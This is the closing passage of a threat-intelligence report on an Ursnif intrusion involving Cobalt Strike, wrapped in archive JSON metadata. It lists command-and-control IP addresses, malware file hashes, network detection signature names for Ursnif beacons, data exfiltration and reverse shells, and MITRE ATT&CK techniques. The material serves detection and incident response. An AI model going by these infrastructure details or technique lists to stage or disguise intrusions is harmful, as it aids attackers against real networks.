IPs:\r\n62.173.149.7\r\n31.41.44.97\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 27 of 32\n\n5.42.199.83\r\n31.41.44.27\r\n208.91.197.91\r\n187.190.48.135\r\n210.92.250.133\r\n189.143.170.233\r\n201.103.222.246\r\n151.251.24.5\r\n190.147.189.122\r\n115.88.24.202\r\n211.40.39.251\r\n187.195.146.2\r\n186.182.55.44\r\n222.232.238.243\r\n211.119.84.111\r\n51.211.212.188\r\n203.91.116.53\r\n115.88.24.203\r\n190.117.75.91\r\n181.197.121.228\r\n190.167.61.79\r\n109.102.255.230\r\n211.119.84.112\r\n190.107.133.19\r\n185.95.186.58\r\n175.120.254.9\r\n46.194.108.30\r\n190.225.159.63\r\n190.140.74.43\r\n187.156.56.52\r\n195.158.3.162\r\n138.36.3.134\r\n109.98.58.98\r\n24.232.210.245\r\n222.236.49.123\r\n175.126.109.15\r\n124.109.61.160\r\n95.107.163.44\r\n93.152.141.65\r\n5.204.145.65\r\n116.121.62.237\r\n31.166.129.162\r\n222.236.49.124\r\n211.171.233.129\r\n211.171.233.126\r\n211.53.230.67\r\n196.200.111.5\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 28 of 32\n\n190.219.54.242\r\n190.167.100.154\r\n110.14.121.125\r\n58.235.189.192\r\n37.34.248.24\r\n110.14.121.123\r\n179.53.93.16\r\n175.119.10.231\r\n211.59.14.90\r\n188.48.64.249\r\n187.232.150.225\r\n186.7.85.71\r\n148.255.20.4\r\n91.139.196.113\r\n41.41.255.235\r\n31.167.236.174\r\n189.165.2.131\r\n1.248.122.240\r\n193.106.191.186\r\nCobalt Strike:\r\n193.201.9.199\r\nComputed\r\n3488164.iso\r\nf7d85c971e9604cc6d2a2ffcac1ee4a3\r\n67175143196c17f10776bdf5fbf832e50a646824\r\ne999890ce5eb5b456563650145308ae837d940e38aec50d2f02670671d472b99\r\n6570872.lnk\r\nc6b605a120e0d3f3cbd146bdbc358834\r\n328afa8338d60202d55191912eea6151f80956d3\r\n16323b3e56a0cbbba742b8d0af8519f53a78c13f9b3473352fcce2d28660cb37\r\nadcomp.bat\r\neb2335e887875619b24b9c48396d4d48\r\nb658ab9ac2453cde5ca82be667040ac94bfcbe2e\r\n4aa4ee8efcf68441808d0055c26a24e5b8f32de89c6a7a0d9b742cce588213ed\r\nalsoOne.bat\r\nc03f5e2bc4f2307f6ee68675d2026c82\r\n4ce65da98f0fd0fc4372b97b3e6f8fbeec32deb3\r\n6a9b7c289d7338760dd38d42a9e61d155ae906c14e80a1fed2ec62a4327a4f71\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 29 of 32\n\ncanWell.js\r\n6bb867e53c46aa55a3ae92e425c6df91\r\n6d4f1a9658baccd2e406454b2ad40ca2353916ab\r\n5b51bd2518ad4b9353898ed329f1b2b60f72142f90cd7e37ee42579ee1b645be\r\nfirefox.exe\r\n6a4356bd2b70f7bd4a3a1f0e0bfec9a4\r\n485a179756ff9586587f8728e173e7df83b1ffc3\r\n6c5338d84c208b37a4ec5e13baf6e1906bd9669e18006530bf541e1d466ba819\r\nitsIt.db\r\n60375d64a9a496e220b6eb1b63e899b3\r\nd1b2dd93026b83672118940df78a41e2ee02be80\r\n8e570e32acb99abfd0daf62cff13a09eb694ebfa633a365d224aefc6449f97de\r\nor.jpg\r\n60ca7723edd4f3a0561ea9d3a42f82b4\r\n87b699122dacf3235303a48c74fa2b7a75397c6b\r\nbbcceb987c01024d596c28712e429571f5758f67ba12ccfcae197aadb8ab8051\r\ncook32.rar\r\n3db94cf953886aeb630f1ae616a2ec25\r\n743128253f1df9e0b8ee296cfec17e5fc614f98d\r\n1cdbf7c8a45b753bb5c2ea1c9fb2e53377d07a3c84eb29a1b15cdc140837f654\r\ncook64.rar\r\nd99cc31f3415a1337e57b8289ac5011e\r\nf67ce90f66f6721c3eea30581334457d6da23aac\r\nb94810947c33a0a0dcd79743a8db049b8e45e73ca25c9bfbf4bfed364715791b\r\nstilak32.rar\r\na1f634f177f73f112b5356b8ee04ad19\r\n7c82b558a691834caf978621f288af0449400e03\r\nc77ea4ad228ecad750fb7d4404adc06d7a28dbb6a5e0cf1448c694d692598f4f\r\nstilak64.rar\r\n8ea6ad3b1acb9e7b2e64d08411af3c9a\r\n7c04c4567b77981d0d97d8c2eb4ebd1a24053f48\r\ndfdfd0a339fe03549b2475811b106866d035954e9bc002f20b0f69e0f986838f\r\nvnc32.rar\r\n0c5862717f00f28473c39b9cba2953f4\r\n25832c23319fcfe92cde3d443cc731ac056a964a\r\n7ebd70819a79be55d4c92c66e74e90e3309ec977934920aee22cd8d922808c9d\r\nvnc64.rar\r\nce77f575cc4406b76c68475cb3693e14\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 30 of 32\n\n80fdc4712ae450cfa41a37a24ce0129eff469fb7\r\nf02dc60872f5a9c2fcc9beb05294b57ad8a4a9cef0161ebe008\r\nDetections\r\nNetwork\r\nPotential Impacket wmiexec.py activity\r\nET MALWARE Ursnif Variant CnC Beacon\r\nET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)\r\nET INFO HTTP Request to a *.top domain\r\nET DNS Query to a *.top domain - Likely Hostile\r\nET MALWARE Ursnif Variant CnC Data Exfil\r\nET INFO Dotted Quad Host RAR Request\r\nET MALWARE Meterpreter or Other Reverse Shell SSL Cert\r\nET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike\r\nET POLICY RDP connection confirm\r\nET POLICY MS Remote Desktop Administrator Login Request\r\nET MALWARE Ursnif Variant CnC Beacon 3\r\nET MALWARE Ursnif Payload Request (cook32.rar)\r\nET MALWARE Ursnif Payload Request (cook64.rar)\r\nET INFO Splashtop Domain (splashtop .com) in TLS SNI\r\nET INFO Splashtop Domain in DNS Lookup (splashtop .com)\r\nSigma\r\nYara\r\nMITRE\r\nMshta - T1218.005\r\nVisual Basic - T1059.005\r\nCompile After Delivery - T1027.004\r\nBITS Jobs - T1197\r\nCredentials from Password Stores - T1555\r\nLSASS Memory - T1003.001\r\nSystem Information Discovery - T1082\r\nProcess Discovery - T1057\r\nDomain Trust Discovery - T1482\r\nMark-of-the-Web Bypass - T1553.005\r\nMalicious File - T1204.002\r\nSystem Time Discovery - T1124\r\nSystem Owner/User Discovery - T1033\r\nRemote System Discovery - T1018\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 31 of 32\n\nRemote Desktop Protocol - T1021.001\r\nWindows Management Instrumentation - T1047\r\nDomain Account - T1087.002\r\nProcess Injection - T1055\r\nAsynchronous Procedure Call - T1055.004\r\nRegistry Run Keys / Startup Folder - T1547.001\r\nRemote Access Software - T1219\r\nWeb Protocols - T1071.001\r\nLateral Tool Transfer - T1570\r\nExfiltration Over C2 Channel - T1041\r\nInternal case #17386\r\nSource: https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 32 of 32",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/"
	],
	"report_names": [
		"unwrapping-ursnifs-gifts"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434677,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c17e16bba1b71d5a3aa5cb6fc11535cf624ab052.pdf",
		"text": "https://archive.orkl.eu/c17e16bba1b71d5a3aa5cb6fc11535cf624ab052.txt",
		"img": "https://archive.orkl.eu/c17e16bba1b71d5a3aa5cb6fc11535cf624ab052.jpg"
	}
}